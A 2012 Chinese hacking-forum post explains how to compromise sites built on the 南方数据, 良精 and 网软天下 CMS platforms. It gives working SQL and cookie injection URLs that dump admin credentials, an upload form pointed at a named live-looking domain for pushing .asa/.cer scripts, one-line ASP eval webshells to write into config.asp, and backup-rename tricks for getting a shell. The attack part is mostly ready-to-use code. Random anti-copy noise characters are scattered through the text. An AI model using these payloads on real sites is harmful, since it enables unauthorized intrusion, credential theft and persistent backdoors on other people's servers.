找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2294|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb. Y6 V  r& W! U1 k
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
# N" M0 h2 U' y$ ~5 @$ h1 p也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
' m0 {, B1 Z' n& x9 @$ E直接暴管理员帐号密码(md5)- U4 e8 F! [/ l3 G% v; v' _: Y0 g; r# @
2.登陆后台
0 q' g3 ?# f$ m1 x! R( h3.利用编辑器上传:% @! G# C" A" a1 E
访问admin/southidceditor/admin_style.asp
, h0 `! x" W4 _( o修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.* N4 O! l7 q4 A9 e; `
5 E* {  g! i- I" |2 E5 i; e3 I9 {( J
========================================
: s9 ~" Y5 O/ M' h. [: R( H8 M! W- b. ?: a/ s2 ]
参考资料整理:2 x7 E& u2 F! D: u. C
南方数据、良精系统、网软天下漏洞利用
1 H; {: i5 C  q" P% Y, e
; g; ~2 M9 S9 f0 r8 x: U1、通过upfile_other.asp漏洞文件直接取SHELL
9 A) S, `1 j6 j; W0 A6 |: J& @直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:2 b6 e# ~+ k' r. ^+ `" R
<HTML><HEAD>
1 _3 c& w+ H  n1 }<META http-equiv=Content-Type content="text/html; charset=gb2312"> ' p* _- l( o" ?% d
<STYLE type=text/css>BODY {
( ^( @- N+ I1 ~/ r& X1 h7 vFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee % g, G' @& d' q) k8 J
} ! d9 i$ ~, ~2 J  ?
.tx1 {
+ \6 [  u6 i: |$ r3 @1 u4 z# EBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
. g' D- h# K7 ?' w- p9 a* y}
. L- \- N* f3 b</STYLE>4 u; \, O1 x1 B' P" Z. X
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> 9 p( N( [7 j7 `5 G7 V6 D/ X
<BODY leftMargin=0 topMargin=0> " V. ?6 Z$ X  h
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 9 u, P3 b6 C0 m. N2 o5 c
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> / I3 V* z, A+ H8 e" |3 q* d# }
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>9 \0 \+ Y- k" ~8 T- J/ d2 ~

$ ^. V! }6 V( R1 R1 _$ S0 p将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
: w. a3 A) |) l: m1 _+ S. x; B注:此方法通杀南方数据、良精系统、网软天下等
6 ?0 n7 y) u" y$ f- \$ |& h% _/ s$ L1 j
2、通过注入秒杀管理员帐号密码,使用如下:
3 s) h/ j5 q1 {( n  a( p6 ohttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’/ F+ m- n# `, h1 r5 ?+ ~
以上代码直接暴管理员帐号和密码,取SHELL方法如下:# l5 P; J6 u- F7 M; J
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’  |9 Y) O& E8 c* _; l# J2 A  k  W
成功把shell写入http://www.target.com/inc/config.asp4 x' o  u. T( M; L3 D5 s8 b
这里一句话chr(32)密码是“#”2 P, n9 ^1 s2 [$ w+ O$ D0 L
3、cookie注入4 P: p5 w* z5 n4 F: H5 M7 Q- i
清空地址栏,利用union语句来注入,提交:
  {' J( Q0 b1 z( h  f2 bjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
8 {: W# [, C+ s1 A/ G* g* `: `1 ?$ g如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
8 O' i! {3 M, e3 Z/ a注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
% s/ |) D- ^! h( _% I' T. V(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助). \5 z4 H7 m& L0 x3 i. x. {) K

6 n9 M7 h7 S- e" p三、后台取SHELL方法总结
# v5 R7 s& ?# C(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:, ]& c1 a/ R; @- O. @" [& [0 _
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
* A$ {; j% l- G2 m% {+ I, T: o% t这时再打开一句话马的客户端,提交同样得到一个小马: R1 `3 _+ z" N9 p( w! P
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)4 h. e, [. n. B' W
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
2 z* H8 c' k# I7 q- Yif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then- s) s$ w8 m% N( ^3 u8 i$ a2 ?& v
EnableUpload=false( |# X  _! z% [8 K' p" X
7 F1 ^+ c% ?& z; j0 z$ i  ~6 h
end if & _: X) F; {6 F  Y) d
if EnableUpload=false then
3 _( y5 t6 z( @0 o' W* t6 Smsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType( G7 b# w! p  o* S
FoundErr=true$ L7 U+ @: h8 P9 W
end if4 y% _5 {+ c; _4 ~( ?8 ~/ U* ]
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
$ R4 u" ~- N$ {6 m% x& Y8 v提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)5 F- s6 Y9 j$ F4 B1 L0 A: |) f
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
2 b* R; z4 X1 C4 Y! s/ S& T) {! W1 L8 \- f; B# \, G
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
' b2 J, B& s. X直接访问备份后的地址,就得到一个webshell
3 l- j0 c9 X( R(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表